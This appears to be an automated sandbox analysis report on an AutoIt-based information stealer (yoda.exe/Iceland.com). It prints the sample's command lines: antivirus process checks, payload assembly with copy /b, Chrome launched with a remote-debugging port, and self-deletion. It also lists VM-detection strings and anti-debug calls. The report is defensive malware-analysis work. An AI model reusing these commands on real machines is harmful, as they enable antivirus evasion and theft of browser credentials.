                Source: V3790H47G.10.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: yoda.exeVirustotal: Detection: 32%
                Source: yoda.exeReversingLabs: Detection: 55%
                Source: C:\Users\user\Desktop\yoda.exeFile read: C:\Users\user\Desktop\yoda.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\yoda.exe "C:\Users\user\Desktop\yoda.exe"
                Source: C:\Users\user\Desktop\yoda.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 314782
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "INSPIRED" Interview
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Qualifications + ..\Iso + ..\Processor + ..\Luther A
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Iceland.com A
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2588 --field-trial-handle=2176,i,7491124011227582456,6124971309095306324,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\314782\Iceland.com" & rd /s /q "C:\ProgramData\4EK6XL68GLNY" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: shfolder.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: riched20.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: usp10.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: msls31.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: textinputframework.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: coreuicomponents.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: coremessaging.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: ntmarta.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: slc.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\yoda.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
                Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: napinsp.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: pnrpnsp.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: wshbth.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: nlaapi.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: mswsock.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: winrnr.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: rstrtmgr.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: dbghelp.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: iertutil.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: winhttp.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: winnsi.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: urlmon.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: schannel.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: msasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: dpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: gpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: propsys.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: windows.fileexplorer.common.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: ntshrui.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: cscapi.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: linkinfo.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: edputil.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: appresolver.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: slc.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: sppc.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: pcacli.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Section loaded: sfc_os.dll
                Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\yoda.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: yoda.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cryptosetup.pdbGCTL source: Iceland.com, 0000000A.00000002.2872631842.0000000005F92000.00000004.00000800.00020000.00000000.sdmp, 2NG4E3.10.dr
                Source: Binary string: cryptosetup.pdb source: Iceland.com, 0000000A.00000002.2872631842.0000000005F92000.00000004.00000800.00020000.00000000.sdmp, 2NG4E3.10.dr
                Source: C:\Users\user\Desktop\yoda.exe Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: yoda.exe Static PE information: real checksum: 0xd304c should be: 0xd780d
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A40DE6 push ecx; ret 10_2_00A40DF9

                Persistence and Installation Behavior

                Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File created: C:\ProgramData\4EK6XL68GLNY\2NG4E3
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00AB26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_00AB26DD
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A3FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00A3FC7C
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\yoda.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep graph_10-105328
                Source: Iceland.com, 0000000A.00000003.1950144358.0000000003974000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Dropped PE file which has not been started: C:\ProgramData\4EK6XL68GLNY\2NG4E3
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com API coverage: 3.7 %
                Source: C:\Windows\SysWOW64\timeout.exe TID: 796 Thread sleep count: 90 > 30
                Source: C:\Windows\SysWOW64\cmd.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
                Source: C:\Windows\SysWOW64\cmd.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\yoda.exe Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\yoda.exe Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A8DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00A8DC54
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A9A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00A9A087
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A9A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00A9A1E2
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A8E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_00A8E472
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A9A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00A9A570
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A966DC FindFirstFileW,FindNextFileW,FindClose,10_2_00A966DC
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A5C622 FindFirstFileExW,10_2_00A5C622
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_00A973D4
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A97333 FindFirstFileW,FindClose,10_2_00A97333
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A8D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00A8D921
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A25FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00A25FC8
                Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\314782
                Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
                Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
                Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\314782\
                Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
                Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
                Source: chrome.exe, 0000000F.00000002.2217707791.0000027800B14000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
                Source: chrome.exe, 0000000F.00000002.2220782297.0000027801144000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware Virtual USB Mouse
                Source: Iceland.com, 0000000A.00000002.2868129868.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 0000000A.00000002.2868559733.0000000000F10000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 0000000A.00000002.2868559733.0000000000F25000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: chrome.exe, 0000000F.00000002.2218481986.0000027800CD4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=5bcbdd8e-e3ac-4636-9808-539ae02e728e
                Source: chrome.exe, 0000000F.00000002.2211179804.000001DF5857E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Process information queried: ProcessInformation
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A9F4FF BlockInput,10_2_00A9F4FF
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A2338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00A2338B
                Source: C:\Users\user\Desktop\yoda.exe Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A45058 mov eax, dword ptr fs:[00000030h]10_2_00A45058
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A820AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,10_2_00A820AA
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A52992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00A52992
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A40BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00A40BAF
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A40D45 SetUnhandledExceptionFilter,10_2_00A40D45
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A40F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00A40F91

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match File source: Process Memory Space: Iceland.com PID: 7592, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A81B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A2338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A8BBED SendInput,keybd_event
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A8EC9E mouse_event
                Source: C:\Users\user\Desktop\yoda.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmd
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 314782
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "INSPIRED" Interview
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Qualifications + ..\Iso + ..\Processor + ..\Luther A
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Iceland.com A
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\314782\Iceland.com" & rd /s /q "C:\ProgramData\4EK6XL68GLNY" & exit
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A814AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A81FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: Iceland.com, 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp, Dedicated.0.dr, Iceland.com.1.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Iceland.com Binary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A40A08 cpuid
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A7E5F4 GetLocalTime
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A7E652 GetUserNameW
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A5BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free
                Source: C:\Users\user\Desktop\yoda.exe Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW

                Stealing of Sensitive Information

                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: 10.2.Iceland.com.3970000.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0000000A.00000003.1950389528.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000002.2871233735.0000000003971000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000002.2868559733.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
